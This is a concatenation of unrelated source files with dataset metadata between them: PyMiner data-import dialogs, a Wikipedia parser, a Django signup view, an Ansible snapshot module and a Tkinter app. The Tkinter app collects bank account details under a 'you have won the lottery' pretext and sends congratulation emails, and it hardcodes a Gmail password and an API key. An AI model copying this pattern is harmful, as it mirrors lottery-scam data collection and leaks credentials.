def getImportParam(self):
"""
获取Excel里头的页面信息
(1)首行列名(2)数据集名称(3)跳过行数(4)限定行数(5)文件编码(6)分割符号
"""
self.updateWarningMessage(new=False)
# Excel 部分,默认都是全部数据导入后在内存中做处理, 因此 ispreview 都是 False
self.import_param.update(
datasetname=self.lineEdit_datasetName.text(),
filepath=self.lineEdit_filePath.text(),
hasheader=self.checkBox_ifColumns.isChecked(),
status=False, varname={}, dtypes={}, loaddataset=False, ismerge=True,
limitrows=self.checkRowsNumber(self.lineEdit_limitRow.text(), "limitRows"),
skiprows=self.checkRowsNumber(self.lineEdit_skipRow.text(), "skipRows"),
param={
"io": self.checkFilePath(self.lineEdit_filePath.text()),
"engine": "python",
"sheet_name": "",
"header": 'infer' if self.checkBox_ifColumns.isChecked() else None,
"nrows": None, # 默认全部加载,在内存中做处理
"index_col": 0 if self.checkBox_ifColIndex.isChecked() else None,
"skiprows": 0
}
)
if self.import_message["isError"]:
return
if self.new_import_filepath != self.import_param["filepath"]:
# 当前仅当文件路径发生变化时候进行重载,否则以内存中数据呈现对应变化
self.import_param.update(loaddataset=True)
self.LoadSheetname()
def LoadSheetname(self):
"""预先加载 sheetname 信息"""
ftype = os.path.split(self.import_param["filepath"])[1].endswith("xls")
# 获取excel 工作簿中所有的sheet,设置 sheet 名
if ftype:
# 针对 xls 格式
wb = xlrd.open_workbook(self.import_param["filepath"])
self.sheetsname = wb.sheet_names()
else:
# 针对 xlsx 格式
wb = openpyxl.load_workbook(self.import_param["filepath"], read_only=True)
self.sheetsname = wb.sheetnames
# 选择导入引擎
self.import_param["param"].update(engine='xlrd' if ftype else 'openpyxl')
# 如果存在多个页面时,需要考虑到将Excel文件中所有页面都导入,因此通过(全部导入)作为标识
# self.updateChooseTagName(self.comboBox_sheetname, tagname = self.sheetsname)
self.comboBox_sheetname.clear()
tagname = ["(全部导入)"] + self.sheetsname if len(self.sheetsname) > 1 else self.sheetsname
for v in tagname:
# 更新Excel导入界面中"数据位置"列表
self.comboBox_sheetname.addItem(v)
def importDatasetReload(self):
"""
刷新导入的数据
"""
if self.import_param["loaddataset"]:
param = self.import_param["param"]
self.current_dataset = {}
for sheet_i in self.sheetsname:
# 默认都是全部加载后在处理
param.update(sheet_name=sheet_i)
self.current_dataset[sheet_i] = pd.read_excel(**param)
run_command("", "pd.read_excel(%s)" % kwargs_to_str(param))
if not self.import_param["ispreview"]:
sheet_ind = self.comboBox_sheetname.currentText()
if sheet_ind != "(全部导入)":
self.import_param.update(ismerge=False)
self.current_dataset = {sheet_ind: self.current_dataset[sheet_ind]}
for name_i, temp in self.current_dataset.items():
if not self.import_param["hasheader"]:
temp = self.headerAsColumns(temp)
self.current_dataset[name_i] = self.datasetUpdate(
data=temp, limitrow=self.import_param["limitrows"], skiprow=self.import_param["skiprows"]
)
self.new_import_filepath = self.import_param["filepath"]
self.getDatasetInfo()
self.import_param.update(status=True, loaddataset=False)
def updateTableView(self):
"""
刷新预览数据
"""
# 处理需要呈现的内容
self.clearPreviewDataTableWidget()
self.updateDatasetNameLine(tag=self.comboBox_sheetname.currentText())
if not self.import_param["status"]:
self.showDatasetPreview(data=pd.DataFrame([]))
return
# 首行是否为列名
header = self.checkBox_ifColumns.isChecked()
# 获取当前选择的表格信息
load_sheet = self.comboBox_sheetname.currentText()
l = self.import_param["limitrows"]
s = self.import_param["skiprows"]
if load_sheet == "(全部导入)":
temp = []
for name_i, data_i in self.current_dataset.items():
if not header:
data_i = self.headerAsColumns(data_i)
data_i = self.datasetUpdate(data_i, limitrow=l, skiprow=s)
row_i, col_i = data_i.shape
temp.append([name_i, row_i, col_i, data_i.columns.tolist()])
header = True # 避免呈现矩阵时候效果出现问题
preview_data = pd.DataFrame(temp, columns=["表名称", "行数", "列数", "列名称"])
else:
preview_data = self.datasetUpdate(self.current_dataset[load_sheet], limitrow=l, skiprow=s)
self.showDatasetPreview(data=preview_data, header=header)
# 优化完成
class ImportSpssForm(ImportDialog, dataImportFormEngine):
"""
打开"从spss导入"窗口
"""
def __init__(self, parent=None):
super().__init__(parent)
self.file_types = "*.sav"
self.IconPath = ":/resources/icons/spss.svg"
self.setupUi(self)
self.center()
self.clearImportParam()
self.updateUIForm()
def AddUIFormActivity(self):
"""增加界面中的操作操作响应"""
self.checkBox_ifColumns.stateChanged.connect(self.updateTableView) # 选择首行是否为列名
self.comboBox_encode.currentIndexChanged.connect(self.previewButton) # 选择编码方式
def updateUIForm(self):
"""ImportTextForm配置参数部分"""
self.encode_type = ["gbk", "utf8", "gb2312", "ascii"]
self.comboBox_encode = self.updateForm_ComboBox(self.comboBox_encode, self.encode_type)
self.horizontalLayoutAddUI(self.checkBox_ifColumns)
self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
self.verticalLayoutAddUI(self.comboBox_encode, "right")
self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")
self.verticalLayoutAddUI(self.lineEdit_skipRow, "right")
self.publicUIFormActivity()
self.AddUIFormActivity()
def getImportParam(self):
"""
获取界面中的配置信息
(1)首行列名(2)数据集名称(3)跳过行数(4)限定行数(5)文件编码(6)分割符号
"""
self.updateWarningMessage(new=False)
self.import_param.update(
datasetname=self.lineEdit_datasetName.text(),
filepath=self.lineEdit_filePath.text(),
hasheader=self.checkBox_ifColumns.isChecked(),
status=False, varname={}, dtypes={},
limitrows=self.checkRowsNumber(self.lineEdit_limitRow.text(), "limitRows"),
skiprows=self.checkRowsNumber(self.lineEdit_skipRow.text(), "skipRows"),
param={
"filename_path": self.checkFilePath(self.lineEdit_filePath.text()),
"encoding": self.comboBox_encode.currentText()
}
)
def importDatasetReload(self):
"""
刷新导入的数据
"""
import pyreadstat
param = self.import_param["param"]
self.current_dataset = {}
varname = self.import_param["datasetname"]
self.current_dataset[varname], meta = pyreadstat.read_sav(**param)
# SPSS一次只导入一个文件,因此默认变名称即为数据集名称
self.getDatasetInfo()
self.import_param.update(status=True)
def updateTableView(self):
"""
刷新预览数据
"""
# 处理需要呈现的内容
self.clearPreviewDataTableWidget()
if not self.import_param["status"]:
return
name = self.import_param["datasetname"]
self.showDatasetPreview(data=self.current_dataset[name], header=True)
# 优化完成
class ImportSasForm(ImportDialog, dataImportFormEngine):
"""打开从sas导入窗口"""
def __init__(self, parent=None):
super().__init__(parent)
self.file_types = "*.sas7bdat"
self.IconPath = ":/resources/icons/sas.ico"
self.setupUi(self)
self.center()
self.clearImportParam()
self.updateUIForm()
def AddUIFormActivity(self):
# 导入窗口的相关事件
# 在"导入"窗口,打开选择文件
self.pushButton_choosefile.clicked.connect(self.chooseFileButton)
# 帮助
self.pushButton_help.clicked.connect(self.showHelp)
# 配置更新数据
self.checkBox_ifColumns.stateChanged.connect(self.updateTableView) # 选择首行是否为列名
self.comboBox_encode.currentIndexChanged.connect(self.previewButton) # 选择编码方式
# 按键更新数据
self.pushButton_preview.clicked.connect(self.previewButton) # 预览
self.pushButton_ok.clicked.connect(self.importDatasetButton) # 导入
self.pushButton_cancel.clicked.connect(self.close) # 取消
def updateUIForm(self):
"""ImportTextForm配置参数部分"""
self.comboBox_encode = self.updateForm_ComboBox(self.comboBox_encode, self.encode_type)
self.horizontalLayoutAddUI(self.checkBox_ifColumns)
self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
self.verticalLayoutAddUI(self.comboBox_encode, "right")
self.verticalLayoutAddUI(self.lineEdit_limitRow, "left")
self.verticalLayoutAddUI(self.lineEdit_skipRow, "right")
self.AddUIFormActivity()
def getImportParam(self):
"""
获取界面中的配置信息
(1)首行列名(2)数据集名称(3)跳过行数(4)限定行数(5)文件编码(6)分割符号
"""
self.updateWarningMessage(new=False)
self.import_param.update(
datasetname=self.lineEdit_datasetName.text(),
filepath=self.lineEdit_filePath.text(),
hasheader=self.checkBox_ifColumns.isChecked(),
status=False, varname={}, dtypes={},
param={
"filepath_or_buffer": self.checkFilePath(self.lineEdit_filePath.text()),
"format": "sas7bdat",
"encoding": self.comboBox_encode.currentText()
}
)
def importDatasetReload(self):
"""
刷新导入的数据
"""
param = self.import_param["param"]
self.current_dataset = {}
varname = self.import_param["datasetname"]
self.current_dataset[varname] = pd.read_sas(**param)
# SPSS一次只导入一个文件,因此默认变名称即为数据集名称
self.getDatasetInfo()
self.import_param.update(status=True)
def updateTableView(self):
"""
刷新预览数据
"""
# 处理需要呈现的内容
self.clearPreviewDataTableWidget()
if not self.import_param["status"]:
return
name = self.import_param["datasetname"]
self.showDatasetPreview(data=self.current_dataset[name], header=True)
# 优化完成
class ImportMatlabForm(ImportDialog, dataImportFormEngine):
"""打开matlab导入窗口"""
def __init__(self, parent=None):
super().__init__(parent)
self.new_import_filepath = ""
self.file_types = "*.mat"
self.IconPath = ":/resources/icons/matlab.svg"
self.setupUi(self)
self.center()
self.clearImportParam()
self.updateUIForm()
def AddUIFormActivity(self):
"""增加界面中的操作操作响应"""
self.checkBox_asDataFrame.stateChanged.connect(self.updateTableView) # 选择首行是否为列名
self.comboBox_varname.currentTextChanged.connect(self.updateTableView)
def updateUIForm(self):
"""ImportMatlabForm配置参数部分"""
self.horizontalLayoutAddUI(self.checkBox_asDataFrame)
self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
self.verticalLayoutAddUI(self.comboBox_varname, "right")
self.publicUIFormActivity()
self.AddUIFormActivity()
def getImportParam(self):
"""
获取界面中的配置信息
(1)首行列名(2)数据集名称(3)跳过行数(4)限定行数(5)文件编码(6)分割符号
"""
self.updateWarningMessage(new=False)
self.import_param.update(
datasetname=self.lineEdit_datasetName.text(),
filepath=self.lineEdit_filePath.text(), loaddataset=False,
status=False, varname={}, dtypes={}, ismerge=True,
asdataframe=self.checkBox_asDataFrame.isChecked(),
param={
"file_name": self.checkFilePath(self.lineEdit_filePath.text())
}
)
if self.import_message["isError"]:
return
if self.new_import_filepath != self.import_param["filepath"]:
# 当前仅当文件路径发生变化时候进行重载,否则以内存中数据呈现对应变化
self.import_param.update(loaddataset=True)
def importDatasetReload(self):
"""
刷新导入的数据
"""
if self.import_param["loaddataset"]:
import scipy.io as sio
param = self.import_param["param"]
self.current_dataset = {}
mat_dataset = sio.loadmat(**param)
self.new_import_filepath = self.import_param["filepath"]
for name_i, var_i in mat_dataset.items():
if type(var_i) == np.ndarray and name_i[:2] != "__":
# 只保留数组类型的数据
# 由于部分非矩阵类型数据也是使用 ndarray 类型存储,因此只能使用 type 获取到的类型和 np.ndarray来比较
# 这样才能定位到需要的数组类型数据
# 注意:目前 scipy.io.loadmat 方法无法解析 matlab 的 table 类型数据!
# 预留一种场景:导入时候以 DataFrame 还是 ndarray 形式
self.current_dataset[name_i] = var_i
self.import_param.update(status=True, loaddataset=False)
self.updateChooseTagName(self.comboBox_varname)
if not self.import_param["ispreview"]:
for name_i, var_i in self.current_dataset.items():
self.current_dataset[name_i] = pd.DataFrame(var_i) if self.import_param["asdataframe"] and len(
var_i.shape) <= 2 else var_i
varname = self.comboBox_varname.currentText()
if varname != "(全部导入)":
self.import_param.update(ismerge=False)
self.current_dataset = {varname: self.current_dataset[varname]}
self.getDatasetInfo() # 更新当前数据集的信息
def updateTableView(self):
"""
刷新预览数据
"""
# 处理需要呈现的内容
varname = self.comboBox_varname.currentText()
self.clearPreviewDataTableWidget()
self.updateDatasetNameLine(tag=varname)
if not self.import_param["status"]:
self.showDatasetPreview(data=pd.DataFrame([]))
return
if varname == "(全部导入)":
temp = []
for name_i, data_i in self.current_dataset.items():
temp.append([name_i, data_i.shape, type(data_i)])
preview_data = pd.DataFrame(temp, columns=["表名称", "大小", "数据格式"])
elif not varname:
return
else:
temp = self.current_dataset[varname]
if len(self.current_dataset[varname].shape) > 2:
temp = pd.DataFrame([{
"变量": varname, "数据类型": type(temp), "数据格式": temp.dtype,
"大小": self.current_dataset[varname].shape
}])
else:
temp = pd.DataFrame(self.current_dataset[varname][0:100])
temp.columns = ["C" + str(i + 1) for i in range(temp.shape[1])]
preview_data = temp
self.showDatasetPreview(data=preview_data, header=True)
# 优化完成
class ImportStataForm(ImportDialog, dataImportFormEngine):
"""打开stata导入窗口"""
def __init__(self, parent=None):
super().__init__(parent)
self.file_types = "*.dta"
self.IconPath = ":/resources/icons/stata.svg"
self.setupUi(self)
self.center()
self.clearImportParam()
self.updateUIForm()
def AddUIFormActivity(self):
"""增加界面中的操作操作响应"""
self.checkBox_ifColIndex.stateChanged.connect(self.updateTableView) # 选择首行是否为列名
def updateUIForm(self):
"""ImportMatlabForm配置参数部分"""
self.horizontalLayoutAddUI(self.checkBox_ifColIndex)
self.verticalLayoutAddUI(self.lineEdit_datasetName, "left")
self.publicUIFormActivity()
self.AddUIFormActivity()
def getImportParam(self):
"""
获取界面中的配置信息
(1)首行列名(2)数据集名称(3)跳过行数(4)限定行数(5)文件编码(6)分割符号
"""
self.updateWarningMessage(new=False)
self.import_param.update(
datasetname=self.lineEdit_datasetName.text(),
filepath=self.lineEdit_filePath.text(),
hasheader=True,
status=False, varname={}, dtypes={},
param={
"filepath_or_buffer": self.checkFilePath(self.lineEdit_filePath.text()),
"index_col": 0 if self.checkBox_ifColIndex.isChecked() else None
}
)
def importDatasetReload(self):
"""
刷新导入的数据
"""
param = self.import_param["param"]
self.current_dataset = {}
varname = self.import_param["datasetname"]
self.current_dataset[varname] = pd.read_stata(**param)
# Stata一次只导入一个文件,因此默认变名称即为数据集名称
self.getDatasetInfo()
self.import_param.update(status=True)
def updateTableView(self):
"""
刷新预览数据
"""
# 处理需要呈现的内容
self.clearPreviewDataTableWidget()
if not self.import_param["status"]:
return
name = self.import_param["datasetname"]
self.showDatasetPreview(data=self.current_dataset[name], header=True)
| pyminer/pyminer | pyminer/packages/dataio/sample.py | sample.py | py | 47,148 | python | zh | code | 77 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "os.path.ex... |
31897243562 | from bs4 import BeautifulSoup
from collections import defaultdict, Counter
class Parser:
@staticmethod
def getWordsArticle(file):
words = []
with open(file, encoding='utf-8') as f:
for line in f:
line = line.split(" => ")
word = line[0].replace("#", "")
count = int(line[1].replace("\n", ""))
words.append((word, count))
return words
@staticmethod
def getAllPages(file):
handler = open(file).read()
soup = BeautifulSoup(handler, 'xml')
return soup.find_all('page')
@staticmethod
def getText(page):
soup = BeautifulSoup(page, 'html.parser')
return soup.title
@staticmethod
def getRefs(text):
soup = BeautifulSoup(text, 'html.parser')
return soup.find_all('ref')
@staticmethod
def solveMatches(matches):
count = Counter([x[0] for x in matches]).most_common()
# If there is no tie
if count[0][1] != count[1][1]:
return count[0][0]
# We only want to look at categories with the same numbers of appearance as the most common one
max_cats = [match[0] for match in count if match[1] == count[0][1]]
# If there is a tie we sum the distances and take the shortest
# If there is a tie between the summed distances, we just take the last one
distance_dict = defaultdict(int)
for k, v in matches:
if k in max_cats:
distance_dict[k] += v
return Counter(distance_dict).most_common()[-1][0]
| cenh/Wikipedia-Heavy-Hitters | Parser.py | Parser.py | py | 1,600 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "bs4.BeautifulSoup",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "collections.Cou... |
36376749917 | # Devin Fledermaus Class 1
import tkinter
from tkinter import *
from tkinter import messagebox
from playsound import playsound
import requests
from datetime import datetime
import re
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
# Creating the window
root = Tk()
root.geometry("700x800")
root.resizable(False, False)
root.title("Banking Details")
root.config(bg="blue")
now = datetime.now()
class BankDetails:
def __init__(self, window):
# Labels
self.lbl1 = Label(window, text="Banking Details", font=("Arial", 30))
self.lbl1.place(x=200, y=30)
self.lbl2 = Label(window, text="Account Holder Name", font=("Arial", 15))
self.lbl2.place(x=50, y=100)
self.lbl3 = Label(window, text="Account number", font=("Arial", 15))
self.lbl3.place(x=50, y=150)
self.lbl4 = Label(window, text="Bank", font=("Arial", 15))
self.lbl4.place(x=50, y=200)
# Entries
self.ent1 = Entry(root, width=30)
self.ent1.place(x=300, y=100)
self.ent2 = Entry(root, width=30)
self.ent2.place(x=300, y=150)
self.ent3 = Entry(root, width=20)
self.ent3.place(x=150, y=500)
self.ent4 = Entry(root, width=20, state="readonly")
self.ent4.place(x=150, y=650)
# OptionMenu
self.default_txt = "Select Bank"
self.default_var = tkinter.StringVar(value=self.default_txt)
self.optmenu = OptionMenu(root, self.default_var, "Absa Bank", "Capitec Bank", "Standard Bank", "First National Bank")
self.optmenu.place(x=300, y=200)
# Buttons
self.btn = Button(root, text="Submit", width=5, bg="green", command=self.check, borderwidth=5)
self.btn.place(x=300, y=320)
self.clrbtn = Button(root, text="Clear", width=5, bg="green", command=self.clear, borderwidth=5)
self.clrbtn.place(x=150, y=320)
self.extbtn = Button(root, text="Exit", width=5, bg="green", command=self.exit_btn, borderwidth=5)
self.extbtn.place(x=450, y=320)
self.conbtn = Button(root, text="Convert", width=16, bg="green", command=self.convert, borderwidth=5)
self.conbtn.place(x=150, y=570)
# Retrieving the information from an external JSON file as a source of reference
self.conversion_rate = {}
try:
self.information = requests.get('https://v6.exchangerate-api.com/v6/910ab09f145c5695a5228187/latest/ZAR')
information_json = self.information.json()
self.conversion_rate = information_json['conversion_rates']
except requests.exceptions.ConnectionError:
messagebox.showerror("Error", "No internet connection. Please try again later.")
# Listbox
self.convert_list = Listbox(root, width=15, bg="white")
for i in self.conversion_rate.keys():
self.convert_list.insert(END, str(i))
self.convert_list.place(x=370, y=500)
# Defining the buttons
# Defining my conversion button
def convert(self):
try:
information = requests.get('https://v6.exchangerate-api.com/v6/910ab09f145c5695a5228187/latest/ZAR')
information_json = information.json()
conversion_rate = information_json['conversion_rates']
num = float(self.ent3.get())
ans = num * information_json['conversion_rates'][self.convert_list.get(ACTIVE)]
self.ent4['state'] = 'normal'
self.ent4.delete(0, END)
self.ent4.insert(0, ans)
self.ent4['state'] = 'readonly'
except (ValueError, requests.exceptions.ConnectionError):
self.ent3.delete(0, END)
self.ent4.delete(0, END)
messagebox.showerror("Error", "Please enter digits")
# Sending my email
def verify(self):
# text file
w = open("user_details.txt", "a+")
w.write("Account Holder Name: " + self.ent1.get() + "\n")
w.write("Account Number: " + self.ent2.get() + "\n")
w.write("Bank: " + self.default_var.get() + "\n")
w.write("Logged in at " + str(now) + " " + "&" + "\n")
w.write("\n")
w.close()
file_to_read = "user_details.txt"
file = open(file_to_read, "r")
list_file = file.readlines()
email_list = str(list_file)
emails = re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", email_list)
email = emails[-1]
sender_email_id = 'lottodevin@gmail.com'
receiver_email_id = email
password = "Pythonlotto"
subject = "Congratulations"
msg = MIMEMultipart()
msg['From'] = sender_email_id
msg['To'] = receiver_email_id
msg['Subject'] = subject
body = "You have won the lottery.\n"
body = body + "You will be contacted for further details"
msg.attach(MIMEText(body, 'plain'))
text = msg.as_string()
s = smtplib.SMTP('smtp.gmail.com', 587)
# start TLS for security
s.starttls()
# Authentication
s.login(sender_email_id, password)
print(receiver_email_id)
# message to be sent
# sending the mail
s.sendmail(sender_email_id, receiver_email_id, text)
# terminating the session
s.quit()
# Defining the submit button
def check(self):
sel = self.ent1.get()
sel2 = self.ent2.get()
# text file
w = open("user_details.txt", "a+")
w.write("Account Holder Name: " + str(sel) + "\n")
w.write("Account Number: " + str(sel2) + "\n")
w.write("Bank: " + self.default_var.get() + " " + "&" + "\n")
w.write("Winnings Claimed at: " + str(now) + "\n")
w.close()
# Account holder error
if not sel.isalpha():
messagebox.showerror('Account Holder Name', 'Please make sure account holder name is entered correctly')
# Account number error
elif not sel2.isdigit():
messagebox.showerror('Account Number', 'Please make sure account number is entered correctly')
# No Bank selected error
elif self.default_var.get() == "Select Bank":
messagebox.showerror('Bank', 'Please select a bank')
else:
self.verify()
self.exit_btn()
# Defining my clear button
def clear(self):
playsound("clear.mp3")
self.ent1.delete(0, END)
self.ent2.delete(0, END)
self.default_var.set(self.default_txt)
self.ent3.delete(0, END)
self.ent4['state'] = "normal"
self.ent4.delete(0, END)
self.ent4['state'] = "readonly"
# Defining my exit button with messagebox
def exit_btn(self):
playsound("exit.mp3")
msg = messagebox.askquestion("Termination", "Are you sure you want to close the program?")
if msg == "yes":
root.destroy()
obj_BankDetails = BankDetails(root)
# Run Program
root.mainloop()
| DevinFledermaus/Lotto_EOMP | main3.py | main3.py | py | 7,008 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime.now",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "tkinter.StringVar",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "requests.ge... |
17884032715 | import logging
import os
import types
from typing import Optional
import core.algorithms as algorithms
from features.extensions.extensionlib import BaseExtension, BaseInterface
from packages.document_server.docserver import Server
logger = logging.getLogger(__name__)
class Extension(BaseExtension):
server = Server(os.path.dirname(algorithms.__file__))
def on_load(self):
logger.info(f'帮助文档服务器:http://127.0.0.1:{self.server.port}')
self.server.run()
class Interface(BaseInterface):
def __init__(self):
self.browser_id: Optional[int] = None
# 记忆上次打开的浏览器id,这样可以保证下次打开帮助文档的时候和上次打开的是同一个内置浏览器,从而节省内存+方便交互。
def open_by_function_name(self, name: str):
"""
对于`pyminer_algorithms`内的函数,按函数名打开文档
:param name: 需要打开的`algorithms`内的函数
:return:
"""
attr_list = dir(algorithms)
if name in attr_list:
func = getattr(algorithms, name)
self.open_by_function_object(func)
def open_external_search_result(self, word_to_search: str):
"""
打开外部搜索链接
:param word_to_search:
:return:
"""
path = 'https://cn.bing.com/search?q=%s' % word_to_search
if self.browser_id is None:
self.browser_id = self.extension.extension_lib.get_interface('embedded_browser').open_url(url=path,
side='right')
else:
self.browser_id = self.extension.extension_lib.get_interface('embedded_browser').open_url(
url=path, browser_id=self.browser_id, side='right')
def open_by_function_object(self, function: types.FunctionType):
"""
传入一个函数,就可以在浏览器中打开帮助文档。
:param function: 这是一个函数,是Callable的函数,不是函数名
:return:
"""
# 关于path的处理说明:将模块路径转换为文件路径
# >>> array.__module__
# 'algorithms.linear_algebra.array'
# >>> array.__module__.split('.', maxsplit=1)[1]
# 'linear_algebra.array'
# >>> array.__module__.split('.', maxsplit=1)[1].replace('.', '/')
# 'linear_algebra/array'
path = function.__module__.split('.', maxsplit=1)[1]
path = path.replace('.', '/')
path = f'{path}.md'
# 以下这4行代码看起来似乎是没用的
if path.startswith('/'):
path = path[1:]
if path.startswith('\\'):
path = path[1:]
# 在内置浏览器中打开帮助文档
port = Extension.server.port
path = f'http://127.0.0.1:{port}/{path}'
embedded_browser = self.extension.extension_lib.get_interface('embedded_browser')
if self.browser_id is None:
self.browser_id = embedded_browser.open_url(url=path, side='right')
else:
self.browser_id = embedded_browser.open_url(url=path, browser_id=self.browser_id, side='right')
| pyminer/pyminer | pyminer/packages/document_server/main.py | main.py | py | 3,241 | python | en | code | 77 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "features.extensions.extensionlib.BaseExtension",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "packages.document_server.docserver.Server",
"line_number": 14,
"usage_ty... |
39553483739 | from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework.exceptions import ParseError
from rest_framework.decorators import action, api_view
from core import models, serializers, utils
from rest_framework_simplejwt.tokens import RefreshToken
@api_view(['POST'])
def signup(req):
data = {}
data['email'] = req.data.get('email')
data['password'] = req.data.get('password')
serializer = serializers.UserSerializer(data = data)
if not serializer.is_valid():
raise ParseError(serializer.errors)
serializer.save()
user = models.User.objects.get(id= serializer.data['id'])
refresh = RefreshToken.for_user(user)
return Response({
'refresh': str(refresh),
'access': str(refresh.access_token),
})
| mahziyar-es/movie-review | server/api/views/auth.py | auth.py | py | 824 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "core.serializers.UserSerializer",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "core.serializers",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "rest_framework.exceptions.ParseError",
"line_number": 20,
"usage_type": "call"
},
{
... |
74059453544 | from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils import dellemc_ansible_utils as utils
import logging
from datetime import datetime, timedelta
from uuid import UUID
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: dellemc_powerstore_snapshot
version_added: '2.6'
short_description: Manage Snapshots on Dell EMC PowerStore.
description:
- Managing Snapshots on PowerStore.
- Create a new Volume Group Snapshot,
- Get details of Volume Group Snapshot,
- Modify Volume Group Snapshot,
- Delete an existing Volume Group Snapshot,
- Create a new Volume Snapshot,
- Get details of Volume Snapshot,
- Modify Volume Snapshot,
- Delete an existing Volume Snapshot.
author:
- Rajshree Khare (Rajshree.Khare@dell.com)
- Prashant Rakheja (prashant.rakheja@dell.com)
extends_documentation_fragment:
- dellemc.dellemc_powerstore
options:
snapshot_name:
description:
- The name of the Snapshot. Either snapshot name or ID is required.
snapshot_id:
description:
- The ID of the Snapshot. Either snapshot ID or name is required.
volume:
description:
- The volume, this could be the volume name or ID.
volume_group:
description:
- The volume group, this could be the volume group name or ID.
new_snapshot_name:
description:
- The new name of the Snapshot.
desired_retention:
description:
- The retention value for the Snapshot.
- If the retention value is not specified, the snap
details would be returned.
- To create a snapshot, either retention or expiration
timestamp must be given.
- If the snap does not have any retention value - specify it as 'None'.
retention_unit:
description:
- The unit for retention.
- If this unit is not specified, 'hours' is taken as default
retention_unit.
- If desired_retention is specified,
expiration_timestamp cannot be specified.
choices: [hours, days]
expiration_timestamp:
description:
- The expiration timestamp of the snapshot. This should be provided in
UTC format, e.g 2019-07-24T10:54:54Z.
description:
description:
- The description for the snapshot.
state:
description:
- Defines whether the Snapshot should exist or not.
required: true
choices: [absent, present]
'''
EXAMPLES = r'''
- name: Create a volume snapshot on PowerStore
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume: "{{volume}}"
description: "{{description}}"
desired_retention: "{{desired_retention}}"
retention_unit: "{{retention_unit_days}}"
state: "{{state_present}}"
- name: Get details of a volume snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume: "{{volume}}"
state: "{{state_present}}"
- name: Rename volume snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
new_snapshot_name: "{{new_snapshot_name}}"
volume: "{{volume}}"
state: "{{state_present}}"
- name: Delete volume snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{new_snapshot_name}}"
volume: "{{volume}}"
state: "{{state_absent}}"
- name: Create a volume group snapshot on PowerStore
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume_group: "{{volume_group}}"
description: "{{description}}"
expiration_timestamp: "{{expiration_timestamp}}"
state: "{{state_present}}"
- name: Get details of a volume group snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume_group: "{{volume_group}}"
state: "{{state_present}}"
- name: Modify volume group snapshot expiration timestamp
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume_group: "{{volume_group}}"
description: "{{description}}"
expiration_timestamp: "{{expiration_timestamp_new}}"
state: "{{state_present}}"
- name: Rename volume group snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
new_snapshot_name: "{{new_snapshot_name}}"
volume_group: "{{volume_group}}"
state: "{{state_present}}"
- name: Delete volume group snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{new_snapshot_name}}"
volume_group: "{{volume_group}}"
state: "{{state_absent}}"
'''
RETURN = r'''
'''
LOG = utils.get_logger('dellemc_powerstore_snapshot',
log_devel=logging.INFO)
py4ps_sdk = utils.has_pyu4ps_sdk()
HAS_PY4PS = py4ps_sdk['HAS_Py4PS']
IMPORT_ERROR = py4ps_sdk['Error_message']
py4ps_version = utils.py4ps_version_check()
IS_SUPPORTED_PY4PS_VERSION = py4ps_version['supported_version']
VERSION_ERROR = py4ps_version['unsupported_version_message']
# Application type
APPLICATION_TYPE = 'Ansible/1.0'
class PowerStoreSnapshot(object):
"""Class with Snapshot operations"""
def __init__(self):
"""Define all the parameters required by this module"""
self.module_params = utils.get_powerstore_management_host_parameters()
self.module_params.update(
get_powerstore_snapshot_parameters())
mutually_exclusive = [
